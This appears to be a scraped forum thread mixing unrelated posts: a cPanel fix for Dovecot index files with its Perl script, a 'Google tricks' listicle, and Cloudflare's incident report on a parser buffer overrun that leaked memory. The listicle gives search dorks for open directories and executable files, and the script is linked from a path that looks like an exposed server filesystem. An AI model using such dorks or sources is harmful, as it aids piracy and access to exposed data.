The strange but also encouraging part was that it was unrelated to the per-session IP, and it did not affect other email accounts, even within the same package (on an addon domain). As always, we are talking about a cPanel box.

cPanel themselves provided the fix, with one of their own scripts:

/scripts/remove_dovecot_index_files --user {user} --verbose

An interesting fix:

[*] (1/1) Processing cPanel user: '{user}' …
Unlinking '/home/{user}/mail/dovecot.index.log' …
Unlinking '/home/{user}/mail/{domain}/{user}/dovecot.index.log.2' …
Unlinking '/home/{user}/mail/{domain}/{user}/dovecot.index.cache' …
Unlinking '/home/{user}/mail/{domain}/{user}/dovecot.index' …
Unlinking '/home/{user}/mail/{domain}/{user}/dovecot.index.log' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Sent/dovecot.index.cache' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Sent/dovecot.index' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Sent/dovecot.index.log' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Drafts/dovecot.index.cache' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Drafts/dovecot.index' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Drafts/dovecot.index.log' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Trash/dovecot.index.cache' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Trash/dovecot.index' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Trash/dovecot.index.log' …
Unlinking '/home/{user}/mail/{domain}/{user}/.spam/dovecot.index.log' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Junk/dovecot.index.log' …
Unlinking '/home/{user}/mail/{domain}/{user}/.Archive/dovecot.index.log' …
[+] '{user}' processed.

I also found the script here: http://www.batangrande.com/fotos/sym/root/scripts/remove_dovecot_index_files

#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/remove_dovecot_index_files
# Copyright 2015 cPanel, Inc.
# All rights Reserved.
# copyright@cpanel.net    http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

package scripts::remove_dovecot_index_files;

use strict;
use File::Find ();
use File::Spec ();
use Getopt::Long ();
use Cpanel::Config::LoadCpConf ();
use Cpanel::PwCache ();
use Cpanel::Reseller ();
use Cpanel::Config::Users ();
use Cpanel::Config::LoadUserOwners ();
use Cpanel::AccessIds::ReducedPrivileges ();

exit run(@ARGV) unless caller();

my $verbose = 0;

sub run {
    my @cmdline_args = @_;
    return usage(1) if !@cmdline_args;

    unless ( $> == 0 && $< == 0 ) {
        return usage( 1, "[!] This program can only be run by root!\n" );
    }

    my $opts = {};
    Getopt::Long::GetOptionsFromArray(
        \@cmdline_args,
        'all'         => \$opts->{'all'},
        'reseller=s@' => \$opts->{'reseller'},
        'user=s@'     => \$opts->{'user'},
        'verbose'     => \$verbose,
        'help|h'      => \$opts->{'help'},
    );
    return usage(0) if $opts->{'help'};

    my $cpconf_ref = Cpanel::Config::LoadCpConf::loadcpconf();
    if ( $cpconf_ref->{'mailserver'} ne 'dovecot' ) {
        return usage( 1, "[!] The configured mailserver is not Dovecot. Action aborted.\n" );
    }

    return process_all_users_on_server() if $opts->{'all'};
    process_reseller( $opts->{'reseller'} ) if $opts->{'reseller'} && scalar @{ $opts->{'reseller'} };
    process_cpanel_user( $opts->{'user'} )  if $opts->{'user'}     && scalar @{ $opts->{'user'} };

    return 0;
}

sub process_cpanel_user {
    my $cpusers_to_process = shift;
    my ( $index, $total ) = ( 1, scalar @{$cpusers_to_process} );
    foreach my $cpuser ( @{$cpusers_to_process} ) {
        print "[*] ($index/$total) Processing cPanel user: '$cpuser' …\n";
        $index++;
        my $homedir = Cpanel::PwCache::gethomedir($cpuser);
        my $maildir = File::Spec->catfile( $homedir, 'mail' );
        if ( !-d $maildir ) {
            print "[!] User's maildir was not found: $maildir - $!\n";
            next;
        }
        my $maxdepth = File::Spec->splitdir($maildir) + 4;
        my $purge_index_files_codref = sub {
            File::Find::find(
                {
                    'wanted' => sub {

                        # Dovecot index files are in "$homedir/mail/domain.tld/emailuser/<dirname>".
                        # So we limit the depth here to what was determined above.
                        return if File::Spec->splitdir($File::Find::name) > $maxdepth;

                        # Remove files that match:
                        #   dovecot.index
                        #   dovecot.index.cache
                        #   dovecot.index.log
                        #   dovecot.index.log.\d+ (rotated log files)
                        return if $_ !~ m/^dovecot\.index(\.cache|\.log(\.\d+)?)?$/;

                        print "Unlinking '$File::Find::name' …\n" if $verbose;
                        if ( -e $File::Find::name && -f $File::Find::name ) {
                            unlink $File::Find::name
                              or print "Failed to unlink '$File::Find::name': $!\n";
                        }
                    },
                    'no_chdir'    => 0,    # default, but setting to be explicit about the usage.
                    'follow_skip' => 2,    # ignore any duplicate files and directories
                },
                $maildir
            );
        };
        eval { Cpanel::AccessIds::ReducedPrivileges::call_as_user( $purge_index_files_codref, $cpuser ) };
        print "[+] '$cpuser' processed.\n";
    }
    return;
}

sub process_reseller {
    my $resellers_to_process = shift;
    foreach my $reseller ( @{$resellers_to_process} ) {
        print "[*] Processing Reseller: '$reseller' …\n";
        if ( !Cpanel::Reseller::isreseller($reseller) ) {
            print "[!] '$reseller' is not reseller.\n\n";
            next;
        }
        my $owners_hr = Cpanel::Config::LoadUserOwners::loadtrueuserowners( {} );
        if ( !( $owners_hr->{$reseller} && 'ARRAY' eq ref $owners_hr->{$reseller} ) ) {
            print "[!] Failed to fetch list of accounts owned by reseller, '$reseller'.\n\n";
            return;
        }
        print "\n";
        process_cpanel_user( $owners_hr->{$reseller} );
        print "\n";
    }
    return;
}

sub process_all_users_on_server {
    my $cpusers = Cpanel::Config::Users::getcpusers();
    if ( !( $cpusers && 'ARRAY' eq ref $cpusers ) ) {
        print "[!] Failed to fetch list of cPanel accounts on server.\n";
        return;
    }
    print "[*] Processing all cPanel users on the server …\n\n";
    process_cpanel_user($cpusers);
    print "\n[+] Finished processing all cPanel users on the server.\n";
    return 0;
}

sub usage {
    my ( $retval, $msg ) = @_;
    my $fh = $retval ? \*STDERR : \*STDOUT;
    if ( !defined $msg ) {
        $msg = <<USAGE;
$0

Utility to remove Dovecot index files.

Available options:

  --user [cPanel username]        Remove Dovecot index files from all email accounts
                                  setup under the specified cPanel user. Can be
                                  specified more than once, to process multiple
                                  users at once.
  --reseller [reseller username]  Remove Dovecot index files from all email accounts
                                  setup under all the cPanel accounts owned by the
                                  specified Reseller. Can be specified more than
                                  once, to process multiple resellers at once.
  --all                           Remove Dovecot index files from all email accounts
                                  setup on the server.
  --verbose                       Prints the full paths of the files being removed.
  --help                          Prints this help text.
USAGE
    }
    print {$fh} $msg;
    return $retval;
}

1;
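For readers curious about what the script actually deletes, here is a minimal shell approximation run against a scratch directory, so it is safe to try anywhere. The paths and file names are illustrative only; on a real cPanel server use the official /scripts/remove_dovecot_index_files, which also drops privileges to the account owner:

```shell
# Build a scratch "maildir" with a few Dovecot index files and one decoy.
maildir=$(mktemp -d)
mkdir -p "$maildir/example.com/info"
touch "$maildir/example.com/info/dovecot.index" \
      "$maildir/example.com/info/dovecot.index.cache" \
      "$maildir/example.com/info/dovecot.index.log.2" \
      "$maildir/example.com/info/keep.me"

# Same name pattern the Perl code matches: dovecot.index, .cache,
# .log, and rotated .log.N files (GNU find syntax).
find "$maildir" -type f -regextype posix-extended \
  -regex '.*/dovecot\.index(\.cache|\.log(\.[0-9]+)?)?' -delete

ls "$maildir/example.com/info"   # → keep.me
```

Dovecot rebuilds the index files automatically on the next IMAP login, which is why this is a safe fix for corrupted-index WebMail errors.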
  16. Hello steve,

    Welcome to designhost.gr.

    Feel free to browse our community accessing all sorts of information and getting to know our members.

    Do not hesitate to ask anything in our forums.

    designhost.gr

  17. New Google Tricks For Fun: There is no doubt that everyone wants to know Google's secret tricks: the tricks few people are aware of, but which come in handy when you need them. Suppose you are a traveller who always wants to stay up to date; then you will find features like Google Flight Status useful. Cool Google tricks have been around for a long time, and now it is time to dig out more.

40 Hidden Cool New Google Tricks For Fun

There is no doubt that Google likes to hide some features from its users, so that curious users go researching these hidden tricks. All the Google tricks are here: we have researched the top 40 new cool Google tricks, many of them useful and many of them just for fun. If you want to impress your friends in an extraordinary way, use these tricks, share them, and have more fun. Previously we shared an article on Google's hidden games, which overlaps with this list but is aimed specifically at users who want to play games on Google. Check out the top tricks below!

1. Google Pacman

The first, and always at the top, is Pac-Man, one of the Google game tricks. Pac-Man has been popular on Google since 2010: it appeared as a Google Doodle on May 21, 2010, for Pac-Man's anniversary, and Google also made the game officially playable. Search for "PacMan" on Google and you will see the game with a Click to Play option. The game was released by Namco in May 1980, when people were still unfamiliar with the internet; back then you put a coin into a Pac-Man arcade machine to play again after Pac-Man died.
Each year on Pac-Man's anniversary, Google has embedded the Doodle on its front page. Enjoy the game, and more Google tricks below.

2. Do a Barrel Roll

"Do a barrel roll" originally describes an aerobatic maneuver in which a pilot rotates an aircraft 360° around its axis. The same trick applies to the Google page: search for "do a barrel roll" on Google and watch what happens; you will have fun for sure. This trick is quite old: Google introduced it as an Easter egg in 2011. There are more new Google tricks below.

3. Google Gravity

Here is one of the most famous new Google tricks. Use it if you want everything on the page to obey Earth-like gravity: everything will fall down. How do you do it? Before you go to the Google search bar, you need to change one browser setting: visit the account preferences page and disable Google Instant results. Now type www.google.com in the address bar, type "Google Gravity" in the search box, and without hitting Enter, move your mouse cursor to the "I'm Feeling Lucky" option in the suggestions and click it.

4. Askew

Another one just for fun: with this trick you will see all the Google search results tilted. If you show it to a friend who does not know the trick, they might think the monitor has a serious problem; use a desktop computer for the best prank. Just type "tilt" or "askew" in the search box and enjoy.

5. Zerg Rush

One interesting search you will encounter is Zerg Rush. I loved it the most,
because when you search for it, the results get destroyed by the Zerg rush: the O's are the enemies of your search results and try to kill all the results instantly. You need to win the race against them (they come in huge numbers) by killing the O's before they destroy all the results. It is very hard to race against them, and when you lose you will see the final result "GG", which means Good Game. Search for more new Google tricks below!

6. Atari Breakout

On Google, type "Atari Breakout", click the "Images" tab, and wait: the image results turn into a playable game. This one is for casual gamers who want to pass the time with a common game, yet it was hugely popular when it launched, and people still play it by searching "Atari Breakout". Destroy all the image results to win the match. You can also search for "atari breakout" and use I'm Feeling Lucky.

7. Chuck Norris

In earlier days, Chuck Norris searches were very popular; people searched just to see what would happen. The result was weird: when someone searched for "Find Chuck Norris", Google responded with a prompt saying, "Google won't search for Chuck Norris because it knows you don't find Chuck Norris, he finds you." If you are wondering who Chuck Norris is: he is a martial artist who also played a role in The Expendables 2, and is now a film producer and screenwriter. Try "find Chuck Norris" with I'm Feeling Lucky.

Updated: now when you search for him you will encounter "Chuck Norris invented Chuck Norris jokes, but he never submitted any because Chuck Norris submits to no one." Quite confusing? Yet an interesting search! More below.

8.
Google Translator Beatbox

Yes, you heard it right: Google Translate can beatbox. If you want to add a little fun to your day, this trick is basically a music composer in which Google Translate speaks out the written words; you can enter any letters or words and the translator will speak them. Try it: copy a string of beatbox-style letters, paste it into the Google Translate box, and click Listen.

9. Do the Harlem Shake

What is the "Do the Harlem Shake" prank? It is an Easter egg in which a group of pranksters at YouTube honored the meme: when you search for "do the Harlem Shake" on www.youtube.com, after about 15 seconds the whole screen starts dancing, or rather shaking, including the video thumbnails and the sidebar navigation. It is an awesome fun trick made for the fans! And it is not the only meme-based Easter egg: when Gangnam Style hit 1 billion views, YouTube set up a dancing view counter.

10. The Dinosaur Game

One of the most addictive games ever on Google Chrome and on Google. If you are good at playing games, try to beat the high scores; players have already scored around 35,000 to 40,000. If you think you can beat them, good luck! The game can be reached from Google Search: type "The Game Dinosaur" and click "I'm Feeling Lucky" in the suggestions to start the game.

11. Conway's Game of Life

This is an older trick, but if you search for "Conway's Game of Life", the simulation keeps running alongside your Google search results. Behind this game is the British mathematician John Conway, who created the Game of Life.

12.
The Loch Ness Monster

In Google Maps, search for "Loch Ness" and you will get a Street View easter egg featuring the monster. This one is for those who have time to explore how these things work; use the comment box to tell us how it went.

13. com/sky

This Google trick gives you a closer look at our galaxy: you can zoom in and out to see different comets, our own Earth, and other planets. Just search for com/sky and open the first result, or visit the site directly.

14. Buildwithchrome.com

Interested in creativity? This Google trick is popular with kids who want to build their own world in another dimension. Google it or visit buildwithchrome.com directly, and you will find endless Lego pieces. Construct your own world with unlimited Lego; the best part is that you learn and exercise your creativity. It is both an educational and a play concept. Keep creating and learning until you get bored of this Lego world!

15. Google "once in a blue moon"

Have you ever seen a blue moon? Search for the phrase "once in a blue moon" in Google and you will see the result presented as a calculation. What is it, exactly? The moon can appear blue after a volcanic eruption, when dust particles floating in the atmosphere diffract blue light; this is also why the moon looks red at sunset.

16. Google Mirror

Another interesting Google trick: on Google Mirror, whatever you search for is shown written backwards, a mirror image of everything. Have you seen an ambulance? The word on the front bonnet is written in a mirrored way.
Just search Google for "Google Mirror" and, without pressing Enter, click "I'm Feeling Lucky". It will take you to the Google Mirror site. Enjoy!

17. Type <blink> in the search box

Just search for <blink> on Google and see what happens! You will agree that Google has thought of everything. Blink, blink, blink.

18. Google Guitar

As we have said from the beginning, Google keeps making its search engine more convenient in every way. Now you can play and make music using Google Guitar: search for "Google Guitar" and use "I'm Feeling Lucky" to be redirected to the Google Guitar page, where you can play guitar tunes. Sing and play! Enjoy more new Google tricks below.

19. Use Google as a timer

Awesome, isn't it? Just search for "set timer" on Google and you can set a timer instantly; you do not need any additional software, only an internet connection. After the time you set runs out, you will hear a constant beep. It also works like a stopwatch.

20. Get a Direct Forecast for Any City

If you live in San Francisco and want to know the weather conditions there, just type "San Francisco forecast" into Google and you will get the current temperature plus the coming days' weather forecast, including humidity and wind speed.

21.
Get Information on a Particular Site on Google

Search for "site:gadgetsay.com" and you will get links only from gadgetsay.com. To narrow it further, say to articles about Skype alternatives, search "site:gadgetsay.com skype alternatives" and you will only get pages on that topic.

22. Calculate the Tip at a Restaurant

This is a "must remember" Google trick. You are at a restaurant and your dinner costs $500: what should the tip be? Search Google for "what is the tip for $500" and it will show you the tip amount; you can even adjust the tip percentage and set the number of people having dinner. Set it as you like, and send some food to Gadgetsay! Enjoy.

23. Check Your Flight Status

If you are a traveller and want to stay up to date, use Google Search to check your flight status: just search something like "Flight Status JAL Flight 707", substituting your own flight number.

24. Search Movie Showtimes at Your Location

In the Google search box, type "movie times in San Francisco" and you will get a list of the shows playing in San Francisco, so you know which show starts when, and at which theatre.

25. Search for "flip a coin"

If you are settling a quiz question or a bet and have no coins on you, let Google do it: type "flip a coin" on your computer or smartphone, or say it into the mic, and Google flips a coin that comes up either heads or tails.

26. Google General Knowledge and Fun Facts

One of the most interesting and educational tricks on Google: if you want to boost your general knowledge,
just search for "fun facts" or "I'm feeling curious" and you will get random questions with answers; you can keep clicking "Ask another question".

27. Listen to Animal Sounds on Google

If you want to know what an animal sounds like, just type "animal sounds" into the Google search box and you will get a set of animals with their vocal sounds.

28. What Are People Searching for Across the World Right Now?

If you want to know what people around the world are searching for right now, you are in the right place: just follow the Google Trends link and see how many people are currently searching for particular terms. Check it out.

29. Google in 1998

Just type "Google in 1998" in the Google search box and you will see how Google looked in 1998. It is a huge transformation across those years.

30. Get a Direct Download Link for Any File

To get a direct download link for an MP3, a video, or a movie file (we have already shared an article on how to get direct download links from Google Search), type in the search box "intitle:index.of?mp3 your song name here"; you can change the extension to mp4, 3gp, or avi. Enjoy ;).

31. Google Is Your Dictionary

If you do not have a dictionary with you, no worries: just Google your word together with "define" and you will get its meaning. For example, to learn the meaning of "congregation", type "define congregation" into Google and you will get its definition.

32. Get Alerts on Any Topic You Want to Follow

If you want alerts on any topic, such as a Trump speech, visit Google Alerts and type in your alert; make sure you are logged into Google, and you will start receiving an alert for every new article on that topic.

33. Search for Any File Type in Google

If you are looking for a specific file type, add a keyword like "filetype:yourfiletype", for example "filetype:.exe", and you will get a list of files of that type with direct download options.

34.
Dig More into a Website

Search "info:website" and you will get information about and history of any popular website. For example, "info:theverge.com" returns information about the site, including from Wikipedia.

35. Find the Release Date of Movies in Your Country

To find any movie's release date, just type the movie name plus "release date" into the Google search box and you will see the first release date in a big format: "(movie name) release date".

36. Find Products in a Given Price Range

Find products on Google within a specific price range. For example, search "2017 phones $100..$150" and you will get a list of smartphones priced between 100 and 150 dollars. See the result.

37. Searching Google on .com but Getting Redirected to .uk or .nl?

When in a different country, you can avoid country-specific redirects on Google: go to google.com/ncr and Google will not redirect you to any country extension, giving you US-based .com results.

38. Need a Calculator? Here You Have It

You really do not need to open a separate application just to calculate numbers: open www.google.com, type "calculator", and the problem is solved.

39. Get Recently Published Articles via Google Search Tools

If you are searching a topic and find several articles, but not the most recently published ones, use Google's Tools: click "Tools" under the search box, and among options like country, timing, and result type, open "Any time" and select "Past hour" or "Past 24 hours" as needed. Enjoy!

40. Find Twitter Profiles on Google

Just type @ followed by any keyword, for example "@Gadgetsay", and you will find the matching Twitter or Flipboard profile.

Conclusion

So these are only the top 40 new Google tricks. If you know more, do not hesitate to add them in the comment section so that others can get your tips too!
Of course, many of these Google tricks are old, but some are new and still in regular use, like the restaurant tip calculator, the regular calculator, and real-time currency exchange rates; some of them are searched for regularly. https://www.gadgetsay.com/hidden-new-google-tricks-search-cool/
  18. https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html
  19. Incident report on memory leak caused by Cloudflare parser bug

Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare.

It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines.

For the avoidance of doubt, Cloudflare customer SSL private keys were not leaked. Cloudflare has always terminated SSL connections through an isolated instance of NGINX that was not affected by this bug.

We quickly identified the problem and turned off three minor Cloudflare features (email obfuscation, Server-side Excludes and Automatic HTTPS Rewrites) that were all using the same HTML parser chain that was causing the leakage. At that point it was no longer possible for memory to be returned in an HTTP response.

Because of the seriousness of such a bug, a cross-functional team from software engineering, infosec and operations formed in San Francisco and London to fully understand the underlying cause, to understand the effect of the memory leakage, and to work with Google and other search engines to remove any cached HTTP responses. Having a global team meant that, at 12 hour intervals, work was handed over between offices enabling staff to work on the problem 24 hours a day. The team has worked continuously to ensure that this bug and its consequences are fully dealt with. One of the advantages of being a service is that bugs can go from reported to fixed in minutes to hours instead of months.
The industry standard time allowed to deploy a fix for a bug like this is usually three months; we were completely finished globally in under 7 hours with an initial mitigation in 47 minutes. The bug was serious because the leaked memory could contain private information and because it had been cached by search engines. We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence.

The greatest period of impact was between February 13 and February 18, with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests). We are grateful that it was found by one of the world’s top security research teams and reported to us.

This blog post is rather long but, as is our tradition, we prefer to be open and technically detailed about problems that occur with our service.

Parsing and modifying HTML on the fly

Many of Cloudflare’s services rely on parsing and modifying HTML pages as they pass through our edge servers. For example, we can insert the Google Analytics tag, safely rewrite http:// links to https://, exclude parts of a page from bad bots, obfuscate email addresses, enable AMP, and more by modifying the HTML of a page. To modify the page, we need to read and parse the HTML to find elements that need changing.

Since the very early days of Cloudflare, we’ve used a parser written using Ragel. A single .rl file contains an HTML parser used for all the on-the-fly HTML modifications that Cloudflare performs.

About a year ago we decided that the Ragel-based parser had become too complex to maintain and we started to write a new parser, named cf-html, to replace it. This streaming parser works correctly with HTML5 and is much, much faster and easier to maintain. We first used this new parser for the Automatic HTTP Rewrites feature and have been slowly migrating functionality that uses the old Ragel parser to cf-html.
Both cf-html and the old Ragel parser are implemented as NGINX modules compiled into our NGINX builds. These NGINX filter modules parse buffers (blocks of memory) containing HTML responses, make modifications as necessary, and pass the buffers onto the next filter.

For the avoidance of doubt: the bug is not in Ragel itself. It is in Cloudflare's use of Ragel. This is our bug and not the fault of Ragel.

It turned out that the underlying bug that caused the memory leak had been present in our Ragel-based parser for many years but no memory was leaked because of the way the internal NGINX buffers were used. Introducing cf-html subtly changed the buffering which enabled the leakage even though there were no problems in cf-html itself.

Once we knew that the bug was being caused by the activation of cf-html (but before we knew why) we disabled the three features that caused it to be used. Every feature Cloudflare ships has a corresponding feature flag, which we call a ‘global kill’. We activated the Email Obfuscation global kill 47 minutes after receiving details of the problem and the Automatic HTTPS Rewrites global kill 3h05m later. The Email Obfuscation feature had been changed on February 13 and was the primary cause of the leaked memory, thus disabling it quickly stopped almost all memory leaks. Within a few seconds, those features were disabled worldwide. We confirmed we were not seeing memory leakage via test URIs and had Google double check that they saw the same thing.

We then discovered that a third feature, Server-Side Excludes, was also vulnerable and did not have a global kill switch (it was so old it preceded the implementation of global kills). We implemented a global kill for Server-Side Excludes and deployed a patch to our fleet worldwide. From realizing Server-Side Excludes were a problem to deploying a patch took roughly three hours. However, Server-Side Excludes are rarely used and only activated for malicious IP addresses. 
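The "global kill" pattern described above can be sketched as a feature flag consulted on every request, so a single flag change stops a feature everywhere. This is an illustrative sketch only, not Cloudflare's implementation; the flag names and the stand-in filter functions are invented.

```python
# Minimal sketch of a "global kill" feature flag, as described above.
# Illustrative only: flag names and filters are invented stand-ins.

FEATURE_FLAGS = {
    "email_obfuscation": True,
    "automatic_https_rewrites": True,
    "server_side_excludes": True,
}

def global_kill(feature):
    """Disable a feature everywhere, immediately."""
    FEATURE_FLAGS[feature] = False

def apply_filters(html):
    """Run only the HTML filters whose flags are still enabled."""
    if FEATURE_FLAGS["email_obfuscation"]:
        html = html.replace("@", " [at] ")          # stand-in for the real filter
    if FEATURE_FLAGS["automatic_https_rewrites"]:
        html = html.replace("http://", "https://")  # stand-in for the real filter
    return html

# Incident response: kill the suspect feature and its filter stops running,
# while unrelated features keep working.
global_kill("email_obfuscation")
print(apply_filters('<a href="http://example.com">bob@example.com</a>'))
```

The point of the pattern is that disabling a feature requires no deploy, only a flag flip, which is why the missing kill switch for Server-Side Excludes cost extra hours.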
Root cause of the bug

The Ragel code is converted into generated C code which is then compiled. The C code uses, in the classic C manner, pointers to the HTML document being parsed, and Ragel itself gives the user a lot of control of the movement of those pointers. The underlying bug occurs because of a pointer error.

/* generated code */
if ( ++p == pe )
    goto _test_eof;

The root cause of the bug was that reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer. This is known as a buffer overrun. Had the check been done using >= instead of == jumping over the buffer end would have been caught. The equality check is generated automatically by Ragel and was not part of the code that we wrote. This indicated that we were not using Ragel correctly.

The Ragel code we wrote contained a bug that caused the pointer to jump over the end of the buffer and past the ability of an equality check to spot the buffer overrun.

Here’s a piece of Ragel code used to consume an attribute in an HTML <script> tag. The first line says that it should attempt to find zero or more unquoted_attr_char followed by (that’s the :>> concatenation operator) whitespace, forward slash or then > signifying the end of the tag.

script_consume_attr := ((unquoted_attr_char)* :>> (space|'/'|'>'))
  >{ ddctx("script consume_attr"); }
  @{ fhold; fgoto script_tag_parse; }
  $lerr{ dd("script consume_attr failed");
         fgoto script_consume_attr; };

If an attribute is well-formed, then the Ragel parser moves to the code inside the @{ } block. If the attribute fails to parse (which is the start of the bug we are discussing today) then the $lerr{ } block is used. For example, in certain circumstances (detailed below) if the web page ended with a broken HTML tag like this:

<script type=

the $lerr{ } block would get used and the buffer would be overrun. 
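The danger of an equality-only end-of-buffer test can be simulated safely in a few lines: if the cursor ever advances by more than one position (the effect of the missing fhold described below), an == test never fires, while a >= test still catches it. This is an illustrative sketch of the failure mode in Python, not the generated C code.

```python
# Simulate the end-of-buffer check from the generated parser code:
#     if ( ++p == pe ) goto _test_eof;
# `p` is the cursor, `pe` is one past the last valid index.
# Illustrative sketch only; `scan` and `skip_at` are invented names.

def scan(buf, skip_at=None, use_equality_check=True):
    """Walk the buffer; optionally skip one extra position at `skip_at`
    (mimicking the missing fhold). Return how many positions past the
    end the cursor travels before the end-of-buffer test fires."""
    p, pe = 0, len(buf)
    overrun = 0
    while True:
        p += 1
        if skip_at is not None and p == skip_at:
            p += 1  # the bug: the cursor jumps an extra step
        at_end = (p == pe) if use_equality_check else (p >= pe)
        if at_end:
            return overrun
        if p >= pe:
            overrun += 1       # would be reading memory past the buffer
            if overrun > 5:    # stop the simulation
                return overrun

buf = "<script type="
print(scan(buf))                                              # normal parse stops at the end
print(scan(buf, skip_at=len(buf), use_equality_check=True))   # == check sails past the end
print(scan(buf, skip_at=len(buf), use_equality_check=False))  # >= check still catches it
```

With the equality check, one skipped position is enough to send the cursor off into adjacent memory, which is exactly the mechanism of the leak.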
In this case the $lerr does dd(“script consume_attr failed”); (that’s a debug logging statement that is a nop in production) and then does fgoto script_consume_attr; (the state transitions to script_consume_attr to parse the next attribute). From our statistics it appears that such broken tags at the end of the HTML occur on about 0.06% of websites.

If you have a keen eye you may have noticed that the @{ } transition also did a fgoto but right before it did fhold and the $lerr{ } block did not. It’s the missing fhold that resulted in the memory leakage.

Internally, the generated C code has a pointer named p that is pointing to the character being examined in the HTML document. fhold is equivalent to p-- and is essential because when the error condition occurs p will be pointing to the character that caused the script_consume_attr to fail. And it’s doubly important because if this error condition occurs at the end of the buffer containing the HTML document then p will be after the end of the document (p will be pe + 1 internally) and a subsequent check that the end of the buffer has been reached will fail and p will run outside the buffer. Adding an fhold to the error handler fixes the problem.

Why now

That explains how the pointer could run past the end of the buffer, but not why the problem suddenly manifested itself. After all, this code had been in production and stable for years. Returning to the script_consume_attr definition above:

script_consume_attr := ((unquoted_attr_char)* :>> (space|'/'|'>'))
  >{ ddctx("script consume_attr"); }
  @{ fhold; fgoto script_tag_parse; }
  $lerr{ dd("script consume_attr failed");
         fgoto script_consume_attr; };

What happens when the parser runs out of characters to parse while consuming an attribute differs depending on whether the buffer currently being parsed is the last buffer or not. 
If it’s not the last buffer, then there’s no need to use $lerr as the parser doesn’t know whether an error has occurred or not as the rest of the attribute may be in the next buffer. But if this is the last buffer, then the $lerr is executed. Here’s how the code ends up skipping over the end-of-file and running through memory.

The entry point to the parsing function is ngx_http_email_parse_email (the name is historical, it does much more than email parsing).

ngx_int_t ngx_http_email_parse_email(ngx_http_request_t *r, ngx_http_email_ctx_t *ctx) {
    u_char *p = ctx->pos;
    u_char *pe = ctx->buf->last;
    u_char *eof = ctx->buf->last_buf ? pe : NULL;

You can see that p points to the first character in the buffer, pe to the character after the end of the buffer and eof is set to pe if this is the last buffer in the chain (indicated by the last_buf boolean), otherwise it is NULL.

When the old and new parsers are both present during request handling a buffer such as this will be passed to the function above:

(gdb) p *in->buf
$8 = {
  pos = 0x558a2f58be30 "<script type=\"",
  last = 0x558a2f58be3e "",
  [...]
  last_buf = 1,
  [...]
}

Here there is data and last_buf is 1. When the new parser is not present the final buffer that contains data looks like this:

(gdb) p *in->buf
$6 = {
  pos = 0x558a238e94f7 "<script type=\"",
  last = 0x558a238e9504 "",
  [...]
  last_buf = 0,
  [...]
}

A final empty buffer (pos and last both NULL and last_buf = 1) will follow that buffer but ngx_http_email_parse_email is not invoked if the buffer is empty.

So, in the case where only the old parser is present, the final buffer that contains data has last_buf set to 0. That means that eof will be NULL. Now when trying to handle script_consume_attr with an unfinished tag at the end of the buffer the $lerr will not be executed because the parser believes (because of last_buf) that there may be more data coming. The situation is different when both parsers are present. 
last_buf is 1, eof is set to pe and the $lerr code runs. Here’s the generated code for it:

/* #line 877 "ngx_http_email_filter_parser.rl" */
{
    dd("script consume_attr failed");
    {goto st1266;}
}
goto st0;
[...]
st1266:
    if ( ++p == pe )
        goto _test_eof1266;

The parser runs out of characters while trying to perform script_consume_attr and p will be pe when that happens. Because there’s no fhold (that would have done p--) when the code jumps to st1266 p is incremented and is now past pe. It then won’t jump to _test_eof1266 (where EOF checking would have been performed) and will carry on past the end of the buffer trying to parse the HTML document.

So, the bug had been dormant for years until the internal feng shui of the buffers passed between NGINX filter modules changed with the introduction of cf-html.

Going bug hunting

Research by IBM in the 1960s and 1970s showed that bugs tend to cluster in what became known as “error-prone modules”. Since we’d identified a nasty pointer overrun in the code generated by Ragel it was prudent to go hunting for other bugs.

Part of the infosec team started fuzzing the generated code to look for other possible pointer overruns. Another team built test cases from malformed web pages found in the wild. A software engineering team began a manual inspection of the generated code looking for problems. At that point it was decided to add explicit pointer checks to every pointer access in the generated code to prevent any future problem and to log any errors seen in the wild. The errors generated were fed to our global error logging infrastructure for analysis and trending. 
#define SAFE_CHAR ({\
    if (!__builtin_expect(p < pe, 1)) {\
        ngx_log_error(NGX_LOG_CRIT, r->connection->log, 0, "email filter tried to access char past EOF");\
        RESET();\
        output_flat_saved(r, ctx);\
        BUF_STATE(output);\
        return NGX_ERROR;\
    }\
    *p;\
})

And we began seeing log lines like this:

2017/02/19 13:47:34 [crit] 27558#0: *2 email filter tried to access char past EOF while sending response to client, client: 127.0.0.1, server: localhost, request: "GET /malformed-test.html HTTP/1.1”

Every log line indicates an HTTP request that could have leaked private memory. By logging how often the problem was occurring we hoped to get an estimate of the number of times an HTTP request had leaked memory while the bug was present.

In order for the memory to leak the following had to be true:

The final buffer containing data had to finish with a malformed script or img tag
The buffer had to be less than 4k in length (otherwise NGINX would crash)
The customer had to either have Email Obfuscation enabled (because it uses both the old and new parsers as we transition),
… or Automatic HTTPS Rewrites/Server Side Excludes (which use the new parser) in combination with another Cloudflare feature that uses the old parser,
… and Server-Side Excludes only execute if the client IP has a poor reputation (i.e. it does not work for most visitors).

That explains why the buffer overrun resulting in a leak of memory occurred so infrequently. Additionally, the Email Obfuscation feature (which uses both parsers and would have enabled the bug to happen on the greatest number of Cloudflare sites) was only enabled on February 13 (four days before Tavis’ report).

The three features implicated were rolled out as follows. The earliest date memory could have leaked is 2016-09-22. 
2016-09-22 Automatic HTTP Rewrites enabled
2017-01-30 Server-Side Excludes migrated to new parser
2017-02-13 Email Obfuscation partially migrated to new parser
2017-02-18 Google reports problem to Cloudflare and leak is stopped

